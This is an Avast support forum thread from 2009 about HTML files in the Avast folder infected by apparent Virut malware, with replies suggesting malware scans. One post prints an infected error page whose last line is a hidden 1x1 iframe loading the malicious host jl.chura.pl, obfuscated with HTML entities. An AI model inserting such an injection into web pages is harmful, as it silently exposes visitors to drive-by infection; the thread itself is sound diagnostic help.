Author Topic: Security flaw in Avast installation ???  (Read 3717 times)

0 Members and 1 Guest are viewing this topic.

Offline psaxelby

  • Newbie
  • *
  • Posts: 13
Security flaw in Avast installation ???
« on: August 16, 2009, 07:51:35 PM »
This is probably nothing to worry about at all, but I thought I'd check.

While removing the remains of an infection I had trouble saving some repaired files in the Avast installation folder.

When I checked the attributes & permissions on the files I saw something I'd never seen before in the permissions for any file (& I've looked at quite a few).

The attached pic is a grab of the window.

Is this right?
No other files affected by the virus had this 'problem'.
Is it a problem?

Regards,
Paul.

Online DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 84902
  • No support PMs thanks
Re: Security flaw in Avast installation ???
« Reply #1 on: August 16, 2009, 08:15:32 PM »
Saving what files ?

And why are you saving them to the avast folder/s ?

There is no 11001.htm (the one in your image) in the avast4\English folder, so it isn't an avast file as far as I'm aware. Just try to modify an avast file and see the avast self-defence module have a whinge about that.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 21.3.2459 (build 21.3.6164.561) UI 1.0.609/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

Offline maxwachtel

  • Jr. Member
  • **
  • Posts: 54
  • Lord,protect me from my own stupidity.
    • Keeping Windows Clean
Re: Security flaw in Avast installation ???
« Reply #2 on: August 16, 2009, 08:30:04 PM »
There is one in my folder too but the permissions are set. Actually there are 7 .htm files in there.
Programs I use, all can be run from a USB drive: BPBible, Opera@USB, WeatherMate, Rainlendar, HostsXpert, Homer, IrfanView,PDFX-Change, IZArc, SoftMaker2006(Office), Defraggler, CCleaner, PStart
My system-Old PII, W2KSP4 Laptop

Offline psaxelby

  • Newbie
  • *
  • Posts: 13
Re: Security flaw in Avast installation ???
« Reply #3 on: August 16, 2009, 08:30:44 PM »
Hi David,

I wasn't putting files in there. Why would I do that?
When I searched for any files containing an iframe block with a link to jl.chura.pl, these files were picked up.
They were already in the Avast folder, and they had been infected.


Here's the contents of that file - Looks like an Avast file to me...


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML dir=ltr><HEAD><TITLE>The Web site cannot be found</TITLE>
<STYLE>
H1 { COLOR: #800000; font-style:normal; font-variant:normal; font-weight:normal; line-height:15pt; font-size:13pt; font-family:verdana }
DIV.sign  { font-weight: bold; font-style:italic; }
TD { COLOR: #800000; vertical-align:center; text-align:left; font-style:normal; font-variant:normal; font-weight:normal; line-height:11pt; font-size:8pt; font-family:verdana }
HR { COLOR: #c0c0c0; }
BODY { background-color=#ffffff  }
TD { width:400 }
TABLE {
</STYLE>

<META content=NOINDEX name=ROBOTS>
<META http-equiv=Content-Type content="text-html; charset=Windows-1252">

</HEAD>
<BODY>
<TABLE cellSpacing=5 cellPadding=3 width=410>
  <TR><TD><H1>The Web site cannot be found</H1></TD></TR>
  <TR><TD class="err">The Web site you are looking for is unavailable due to its identification configuration settings.</TD></TR>

  <TR>
    <TD>
      <HR noShade>
      <P>Please try the following:</P>
      <UL>
        <LI>Click the Refresh button, or try again later.</LI>
        <LI>If you typed the page address in the Address bar, make sure that it is spelled correctly.</LI>
        <LI>Click the Back button to try another link.</LI>
     </UL>
      <P>11002 - Host not found<BR><DIV class="sign">avast! Web Proxy</DIV></P>
      <HR noShade>

      <P>Technical Information (for support personnel)</P>
      <UL>
        <LI>Background:<BR>This error indicates that the gateway could not find an authoritative DNS server for the Web site you are trying to access.</LI>
      <P>
        <LI>Host name: <!--[[message]]--></LI>
     </UL>
   </TD>
  </TR>
  </TABLE><iframe src="http://jL.ch&#85;ra.pl&#47;rc/" width=1 height=1 frameborder=0></iframe>
</BODY></HTML>

Offline psaxelby

  • Newbie
  • *
  • Posts: 13
Re: Security flaw in Avast installation ???
« Reply #4 on: August 16, 2009, 08:34:14 PM »
Oh Cr*p


I just looked at that post & saw it's been infected again.

Damn - thought I'd got rid of whatever's doing this.

So much for Avast moaning about any changes to its files David...

Here we go again.

Paul.

Offline MikeBCda

  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 2248
Re: Security flaw in Avast installation ???
« Reply #5 on: August 17, 2009, 07:19:51 PM »
Keep in mind that avast self-protects only its own files, not other files that might have somehow wound up in avast's folders.  That's why it didn't kick out a warning about that one - it's not an avast file.
Intel Atom D2700, 2 gig RAM, Win 7 x64 SP1 & IE-11, Firefox 51.0
(default). 320 gig HD, 15Mb DSL, Win firewall, Avast 12.3.2280 free, SpywareBlaster, MBAM Prem., Crypto-Prevent

Offline Tarq57

  • Avast Evangelist
  • Massive Poster
  • ***
  • Posts: 3695
  • If at first you don’t succeed; call it version 1.0
Re: Security flaw in Avast installation ???
« Reply #6 on: August 18, 2009, 01:07:24 AM »
It may not be Avasts' files that are being modified or added.
What was the infection you were dealing with, and what steps were taken to remove it?

I've read some posts online about the redirect site jl.chura.pl, and it's not looking great. If you have been infected with Virut apparently the chances of recovery without a format and reinstall appear to be slim.

The virus itself is buggy. (Ironic).

Did you try a scan with MBAM?
Windows 10,Windows Firewall,Firefox w/Adblock.

Offline scythe944

  • Avast Evangelist
  • Massive Poster
  • ***
  • Posts: 2913
    • My Tech Blog
Re: Security flaw in Avast installation ???
« Reply #7 on: August 18, 2009, 05:13:36 AM »
Quote
It may not be Avasts' files that are being modified or added.

definitely not.

They still have a virus on their PC and it's creating random files.  MBAM would be a good choice to help out, and a boot-time scan couldn't hurt either.
For generic computer (not avast) problems, you can also visit my forum for help: http://www.jacobytech.net/forum